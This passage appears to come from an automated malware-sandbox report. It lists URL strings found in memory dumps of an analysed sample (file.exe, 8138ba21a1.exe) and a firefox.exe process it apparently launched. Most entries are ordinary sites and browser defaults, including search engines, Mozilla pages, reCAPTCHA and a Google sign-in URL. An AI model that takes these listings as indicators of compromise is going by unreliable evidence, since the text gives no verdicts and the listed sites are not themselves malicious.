Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2170759523.000001C967C10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2170759523.000001C967C10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968331000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2094028920.000001C9686CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F716000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96884F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C9688AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2110617616.000001C9686CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C96836D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1418033893.0000000001170000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.1417736971.00000000011AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/a
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/acces
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accesordsX
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/accesordsXX
Source: file.exe, 00000000.00000003.1417659219.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: firefox.exe, 0000001D.00000002.2175868045.000001C96836D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2028791099.000001C96F429000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2029722717.000001C96F3C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001D.00000002.2175868045.000001C96836D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1432143495.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431960048.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2000505983.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059E9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999766208.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984164128.000001C966D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2094028920.000001C9686CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F716000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96884F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C9688AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2110617616.000001C9686CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: file.exe, 00000000.00000003.1460412273.000000000598E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962AAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F74A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2116291536.0000003BB00FB000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C9674AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F748000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F00D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965721000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.2175868045.000001C968399000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F0C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2051838135.000001C967649000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2054319782.000001C96763E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2050257508.000001C96763A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: file.exe, 00000000.00000003.1460153484.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049402279.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F7E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A5E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.1460153484.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049402279.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.c3a9
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F03C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C969403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F73F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C9696DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96967B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2260814057.000001C96A8BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 0000001D.00000002.2168505988.000001C9678EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F5F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2126645860.000001C962BA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121418359.000001C956F90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C96831E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C95725D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2122168164.000001C957203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2121556768.000001C956FC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2252344441.000001C96965D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
